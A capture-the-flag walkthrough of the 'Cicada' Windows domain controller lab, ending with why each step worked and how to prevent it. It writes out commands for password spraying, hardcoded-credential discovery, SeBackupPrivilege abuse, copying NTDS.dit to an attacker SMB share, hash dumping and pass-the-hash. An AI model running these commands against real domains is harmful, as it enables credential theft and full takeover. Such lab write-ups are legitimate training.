Summary
Cicada is an Easy Windows AD box that demonstrates the danger of hardcoded credentials and default passwords in shared network resources. The foothold begins with anonymous/guest SMB access to an HR share, revealing a default new-employee password. Password spraying this default credential against enumerated users identifies a valid account (michael.wrightson). Using Michael’s access to query LDAP, we discover another user’s (david.orelious) password stored in their account description field.
David has read access to a DEV share containing a PowerShell backup script with hardcoded credentials for a third user, emily.oscars. Emily is a member of the Backup Operators group, granting her SeBackupPrivilege. This privilege allows us to bypass file permissions, enabling the use of diskshadow and robocopy to extract the NTDS.dit database and the SYSTEM registry hive. Finally, we extract the Administrator’s NTLM hash locally and use it to Pass-the-Hash for full domain compromise.
Recon
Initial enumeration reveals a standard Windows Domain Controller profile with SMB guest access enabled.
Foothold — HR default + LDAP description
We start by enumerating SMB shares as a guest user. We find an HR share that contains a file named Notice from HR.txt. This file explicitly states the default password given to new employees.
smbclient //<DC>/HR -U guest%
get 'Notice from HR.txt'
# password: <redacted>
We can then use a tool like netexec to brute-force a list of RIDs and identify valid domain users. Spraying the default password against these users reveals that michael.wrightson has not changed his password.
netexec smb <DC> -u guest -p '' --rid-brute 5000
# Found multiple users
netexec smb <DC> -u users.txt -p '<redacted>' --no-bruteforce
# michael.wrightson VALID
With a valid domain account, we can query LDAP for more information. Checking the description attribute of all users is a common technique, as administrators sometimes temporarily store passwords or notes there. Querying as Michael reveals David’s password.
ldapsearch -x -H ldap://<DC> -D '[email protected]' \
-w '<pw>' -b 'DC=cicada,DC=htb' '(objectClass=user)' description \
| grep -A1 david
# description: <redacted>
Testing David’s credentials reveals he has read access to the DEV share. Inside, we find a script named Backup_script.ps1 which contains hardcoded PowerShell credentials for emily.oscars.
smbclient //<DC>/DEV -U david.orelious%'<pw>'
get Backup_script.ps1
# Script contains hardcoded credentials for emily.oscars
We can now authenticate to the server via WinRM using Emily’s credentials.
evil-winrm -i <DC> -u emily.oscars -p '<pw>'
Privesc — Backup Operators → NTDS
Checking Emily’s privileges reveals she is a member of the Backup Operators group, granting her SeBackupPrivilege and SeRestorePrivilege. These privileges are designed to allow backup software to read any file on the system, regardless of its ACL.
PS> whoami /priv | findstr -i Backup
SeBackupPrivilege Enabled
SeRestorePrivilege Enabled
We can abuse this by using diskshadow.exe to create a shadow copy of the C: drive. This is necessary because the Active Directory database (NTDS.dit) is constantly locked by the system. We write a short script for diskshadow to automate the shadow copy creation and expose it as the Z: drive.
PS> New-Item -ItemType Directory -Force -Path C:\Temp | Out-Null
PS> $commands = "set context persistent nowriters", "add volume C: alias bbb", "create", "expose %bbb% Z:", "exit"
PS> $commands | Out-File C:\Temp\ds.txt -Encoding ascii
PS> diskshadow.exe /s C:\Temp\ds.txt
Once exposed, we use robocopy with the /b flag (backup mode) to copy the NTDS.dit file out of the shadow copy, bypassing file locks and permissions. We also save the SYSTEM registry hive, which contains the boot key needed to decrypt the database.
PS> robocopy /b Z:\Windows\NTDS C:\Temp ntds.dit
PS> reg save HKLM\SYSTEM C:\Temp\system
To exfiltrate these files, setting up an SMB server on the attacking machine and copying them over the network is often more reliable than attempting to download large files directly through WinRM.
# On attacking machine
impacket-smbserver share $(pwd) -smb2support
# On target via WinRM
PS> Copy-Item -Path C:\Temp\ntds.dit -Destination \\<attacker-ip>\share\ntds.dit -Force
PS> Copy-Item -Path C:\Temp\system -Destination \\<attacker-ip>\share\system -Force
Finally, we parse the dumped database locally using impacket-secretsdump to extract the NTLM hashes of all domain users, including the Administrator.
impacket-secretsdump -ntds ntds.dit -system system LOCAL
# Extracts Administrator NT hash
We can then use Pass-the-Hash with WinRM to authenticate as the Administrator and retrieve the root flag.
netexec winrm <DC> -u Administrator -H <hash> -x 'type C:\Users\Administrator\Desktop\root.txt'
Why each step worked
- HR notice + default password: Storing default passwords in universally readable shares without enforcing a password change at next logon is a critical operational failure.
- LDAP description as a notepad: The LDAP
descriptionfield is readable by any authenticated domain user. Using it to store sensitive information like passwords directly exposes that information to the entire domain. - Hardcoded PS creds: Embedding credentials directly within scripts (even if obfuscated or cast to a
SecureStringfrom plaintext) makes them trivially recoverable if the script is readable by unauthorized users. - SeBackupPrivilege: This privilege intentionally bypasses file read ACLs. When granted to an account, it effectively provides a path to domain dominance because it allows copying the
NTDS.ditfile.
Counterfactuals
- Secure Default Passwords: Enforce the “User must change password at next logon” setting for all new accounts. Do not post default passwords in open shares.
- Protect LDAP Attributes: Regularly audit LDAP attributes (like
descriptionorinfo) for sensitive data and remove it. - Credential Management: Use secure credential vaults or Group Managed Service Accounts (gMSAs) instead of hardcoding credentials in scripts.
- Restrict Privileged Groups: Severely restrict membership in groups like Backup Operators. Ensure accounts in these groups cannot log on interactively or via WinRM if not strictly necessary.
Source attribution
I have personally engaged with and rooted this box. The methodologies used align with standard Active Directory enumeration and exploitation techniques.